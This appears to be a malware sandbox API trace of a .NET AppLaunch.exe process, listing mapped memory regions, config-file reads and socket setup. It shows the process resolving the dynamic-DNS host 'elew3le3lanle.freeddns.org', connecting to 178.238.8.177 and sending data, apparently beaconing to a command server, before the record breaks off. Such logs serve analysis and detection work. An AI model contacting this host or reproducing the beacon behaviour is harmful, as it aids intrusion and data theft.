"\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 4428 start_va = 0x500000 end_va = 0x500fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4429 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 4430 start_va = 0x745b0000 end_va = 0x745d0fff monitored = 0 entry_point = 0x745b145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 4431 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 4432 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 4433 start_va = 0x940000 end_va = 0x956fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 4434 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 4435 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 4436 start_va = 0x9e0000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 4437 start_va = 0x970000 end_va = 0x973fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 4438 start_va = 0x58b0000 end_va = 0x5915fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 4439 start_va = 0x9c0000 end_va = 0x9cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 4440 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4441 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4442 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4443 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4444 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 4445 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 4446 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 4447 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4448 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 4449 start_va = 0xa20000 end_va = 0xa2cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 4467 start_va = 0x5700000 end_va = 0x573ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 4468 start_va = 0x5bb0000 end_va = 0x5caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 4469 start_va = 0x6c220000 end_va = 0x6c231fff monitored = 0 entry_point = 0x6c221200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4470 start_va = 0xfff2e000 end_va = 0xfff30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff2e000" filename = "" Region: id = 4837 start_va = 0x5860000 end_va = 0x589ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005860000" filename = "" Region: id = 4838 start_va = 0x5940000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005940000" filename = "" Region: id = 4839 start_va = 0xfff3a000 end_va = 0xfff3cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3a000" filename = "" Region: id = 4862 start_va = 0x4cd0000 end_va = 0x4d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 4863 start_va = 0x5d10000 end_va = 0x5e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 4864 start_va = 0xfff31000 end_va = 0xfff33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff31000" filename = "" Region: id = 4865 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 4866 start_va = 0xa40000 end_va = 0xa43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Thread: id = 100 os_tid = 0xec8 [0146.269] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0154.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x36eb60 | out: phkResult=0x36eb60*=0x0) returned 0x2 [0154.207] RegCloseKey (hKey=0x80000002) returned 0x0 [0155.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x36e5b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0155.676] GetCurrentProcess () returned 0xffffffff [0155.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e8f0 | out: TokenHandle=0x36e8f0*=0x40) returned 1 [0155.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x36e3a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0155.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x36e8e8 | out: lpFileInformation=0x36e8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0155.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x36e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x36e8f0 | out: lpFileInformation=0x36e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0155.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x36e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36e828) returned 1 [0155.705] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1e4 [0155.705] GetFileType (hFile=0x1e4) returned 0x1 [0155.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36e824) returned 1 [0155.705] GetFileType (hFile=0x1e4) returned 0x1 [0156.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x36db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0156.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x36dbc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0156.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36de04) returned 1 [0156.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x36e0c8 | out: lpFileInformation=0x36e0c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0156.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36de00) returned 1 [0156.949] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x36df94 | out: pfEnabled=0x36df94) returned 0x0 [0157.374] GetFileSize (in: hFile=0x1e4, lpFileSizeHigh=0x36e8e4 | out: lpFileSizeHigh=0x36e8e4*=0x0) returned 0x8c8e [0157.375] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e8a0, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e8a0*=0x1000, lpOverlapped=0x0) returned 1 [0157.716] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e750, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e750*=0x1000, lpOverlapped=0x0) returned 1 [0157.718] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e604, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e604*=0x1000, lpOverlapped=0x0) returned 1 [0157.718] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e604, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e604*=0x1000, lpOverlapped=0x0) returned 1 [0157.719] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e604, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e604*=0x1000, lpOverlapped=0x0) returned 1 [0157.719] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e53c, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e53c*=0x1000, lpOverlapped=0x0) returned 1 [0157.726] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e6a8, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e6a8*=0x1000, lpOverlapped=0x0) returned 1 [0157.729] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e59c, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e59c*=0x1000, lpOverlapped=0x0) returned 1 [0157.729] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e59c, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e59c*=0xc8e, lpOverlapped=0x0) returned 1 [0157.729] ReadFile (in: hFile=0x1e4, lpBuffer=0x235c36c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e660, lpOverlapped=0x0 | out: lpBuffer=0x235c36c*, lpNumberOfBytesRead=0x36e660*=0x0, lpOverlapped=0x0) returned 1 [0157.729] CloseHandle (hObject=0x1e4) returned 1 [0157.730] CloseHandle (hObject=0x40) returned 1 [0157.731] GetCurrentProcess () returned 0xffffffff [0157.731] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ea3c | out: TokenHandle=0x36ea3c*=0x40) returned 1 [0157.732] CloseHandle (hObject=0x40) returned 1 [0157.732] GetCurrentProcess () returned 0xffffffff [0157.733] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ea3c | out: TokenHandle=0x36ea3c*=0x40) returned 1 [0157.733] CloseHandle (hObject=0x40) returned 1 [0157.735] GetCurrentProcess () returned 0xffffffff [0157.735] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e8f0 | out: TokenHandle=0x36e8f0*=0x40) returned 1 [0157.736] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x36e8e8 | out: lpFileInformation=0x36e8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39c5900, ftCreationTime.dwHighDateTime=0x1cac64f, ftLastAccessTime.dwLowDateTime=0xf6bca250, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xc39c5900, ftLastWriteTime.dwHighDateTime=0x1cac64f, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0157.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x36e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0157.737] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x36e8f0 | out: lpFileInformation=0x36e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39c5900, ftCreationTime.dwHighDateTime=0x1cac64f, ftLastAccessTime.dwLowDateTime=0xf6bca250, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xc39c5900, ftLastWriteTime.dwHighDateTime=0x1cac64f, nFileSizeHigh=0x0, nFileSizeLow=0x119)) returned 1 [0157.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", nBufferLength=0x105, lpBuffer=0x36e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config", lpFilePart=0x0) returned 0x42 [0157.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36e828) returned 1 [0157.738] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1e4 [0157.738] GetFileType (hFile=0x1e4) returned 0x1 [0157.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36e824) returned 1 [0157.738] GetFileType (hFile=0x1e4) returned 0x1 [0157.739] GetFileSize (in: hFile=0x1e4, lpFileSizeHigh=0x36e8e4 | out: lpFileSizeHigh=0x36e8e4*=0x0) returned 0x119 [0157.739] ReadFile (in: hFile=0x1e4, lpBuffer=0x2374b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e8a0, lpOverlapped=0x0 | out: lpBuffer=0x2374b38*, lpNumberOfBytesRead=0x36e8a0*=0x119, lpOverlapped=0x0) returned 1 [0157.789] ReadFile (in: hFile=0x1e4, lpBuffer=0x2374b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e764, lpOverlapped=0x0 | out: lpBuffer=0x2374b38*, lpNumberOfBytesRead=0x36e764*=0x0, lpOverlapped=0x0) returned 1 [0157.789] CloseHandle (hObject=0x1e4) returned 1 [0157.789] CloseHandle (hObject=0x40) returned 1 [0157.789] GetCurrentProcess () returned 0xffffffff [0157.790] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ea3c | out: TokenHandle=0x36ea3c*=0x40) returned 1 [0157.790] CloseHandle (hObject=0x40) returned 1 [0157.791] GetCurrentProcess () returned 0xffffffff [0157.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ea3c | out: TokenHandle=0x36ea3c*=0x40) returned 1 [0157.792] CloseHandle (hObject=0x40) returned 1 [0157.938] GetCurrentProcess () returned 0xffffffff [0157.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e854 | out: TokenHandle=0x36e854*=0x40) returned 1 [0158.085] CloseHandle (hObject=0x40) returned 1 [0158.085] GetCurrentProcess () returned 0xffffffff [0158.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e86c | out: TokenHandle=0x36e86c*=0x40) returned 1 [0158.087] CloseHandle (hObject=0x40) returned 1 [0158.153] GetCurrentProcess () returned 0xffffffff [0158.153] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e070 | out: TokenHandle=0x36e070*=0x40) returned 1 [0158.287] CloseHandle (hObject=0x40) returned 1 [0158.288] GetCurrentProcess () returned 0xffffffff [0158.288] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e088 | out: TokenHandle=0x36e088*=0x40) returned 1 [0158.288] CloseHandle (hObject=0x40) returned 1 [0159.079] GetCurrentProcess () returned 0xffffffff [0159.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ef64 | out: TokenHandle=0x36ef64*=0x40) returned 1 [0159.185] CloseHandle (hObject=0x40) returned 1 [0159.186] GetCurrentProcess () returned 0xffffffff [0159.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ef7c | out: TokenHandle=0x36ef7c*=0x40) returned 1 [0159.187] CloseHandle (hObject=0x40) returned 1 [0159.987] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x36e7f4 | out: phkResult=0x36e7f4*=0x0) returned 0x2 [0159.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x36e7f4 | out: phkResult=0x36e7f4*=0x0) returned 0x2 [0161.400] EtwEventRegister () returned 0x0 [0161.641] GetCurrentProcess () returned 0xffffffff [0161.641] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ef7c | out: TokenHandle=0x36ef7c*=0x1e4) returned 1 [0161.643] CloseHandle (hObject=0x1e4) returned 1 [0161.643] GetCurrentProcess () returned 0xffffffff [0161.643] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ef94 | out: TokenHandle=0x36ef94*=0x1e4) returned 1 [0161.645] CloseHandle (hObject=0x1e4) returned 1 [0161.829] EtwEventRegister () returned 0x0 [0161.851] EtwEventRegister () returned 0x0 [0162.058] CoCreateGuid (in: pguid=0x36f048 | out: pguid=0x36f048*(Data1=0xcfa9958a, Data2=0x2927, Data3=0x4046, Data4=([0]=0xae, [1]=0x73, [2]=0x22, [3]=0x8f, [4]=0x55, [5]=0xd, [6]=0x43, [7]=0x88))) returned 0x0 [0162.062] CoCreateGuid (in: pguid=0x36ef8c | out: pguid=0x36ef8c*(Data1=0x2815699d, Data2=0x880e, Data3=0x4519, Data4=([0]=0x99, [1]=0xc7, [2]=0xce, [3]=0x2d, [4]=0x6d, [5]=0xe0, [6]=0x52, [7]=0xe2))) returned 0x0 [0162.243] CoCreateGuid (in: pguid=0x36ee24 | out: pguid=0x36ee24*(Data1=0x18ee5635, Data2=0x54d6, Data3=0x4945, Data4=([0]=0xa4, [1]=0xa2, [2]=0xa0, [3]=0x14, [4]=0xe0, [5]=0x8a, [6]=0x5a, [7]=0x18))) returned 0x0 [0162.488] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36eaa8 | out: lpWSAData=0x36eaa8) returned 0 [0162.500] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x238 [0162.969] setsockopt (s=0x238, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0162.970] closesocket (s=0x238) returned 0 [0162.970] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x238 [0163.048] setsockopt (s=0x238, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0163.048] closesocket (s=0x238) returned 0 [0163.058] GetCurrentProcess () returned 0xffffffff [0163.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e8a8 | out: TokenHandle=0x36e8a8*=0x238) returned 1 [0163.064] CloseHandle (hObject=0x238) returned 1 [0163.065] GetCurrentProcess () returned 0xffffffff [0163.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e8c0 | out: TokenHandle=0x36e8c0*=0x238) returned 1 [0163.065] CloseHandle (hObject=0x238) returned 1 [0163.090] GetAddrInfoW (in: pNodeName="elew3le3lanle.freeddns.org", pServiceName=0x0, pHints=0x36ec90*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x36ec38 | out: ppResult=0x36ec38*=0x7446f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="elew3le3lanle.freeddns.org", ai_addr=0x744090*(sa_family=2, sin_port=0x0, sin_addr="178.238.8.177"), ai_next=0x0)) returned 0 [0164.541] FreeAddrInfoW (pAddrInfo=0x7446f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="elew3le3lanle.freeddns.org", ai_addr=0x744090*(sa_family=2, sin_port=0x0, sin_addr="178.238.8.177"), ai_next=0x0)) [0164.544] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x264 [0164.738] WSAConnect (in: s=0x264, name=0x23fc2e8*(sa_family=2, sin_port=0x1219, sin_addr="178.238.8.177"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0164.844] setsockopt (s=0x264, level=65535, optname=4098, optval="", optlen=4) returned 0 [0164.844] setsockopt (s=0x264, level=65535, optname=4097, optval="", optlen=4) returned 0 [0164.846] setsockopt (s=0x264, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0164.846] setsockopt (s=0x264, level=65535, optname=4101, optval="Gq\x1b", optlen=4) returned 0 [0164.846] send (s=0x264, buf=0x23eeebc*, len=52, flags=0) returned 52 [0164.848] setsockopt (s=0x264, level=65535, optname=4102, optval="Gq\x1b", optlen=4) returned 0 [0164.848] recv (in: s=0x264, buf=0x241c7d4, len=1, flags=0 | out: buf=0x241c7d4*) returned 1 [0164.920] send (s=0x264, buf=0x241d173*, len=217, 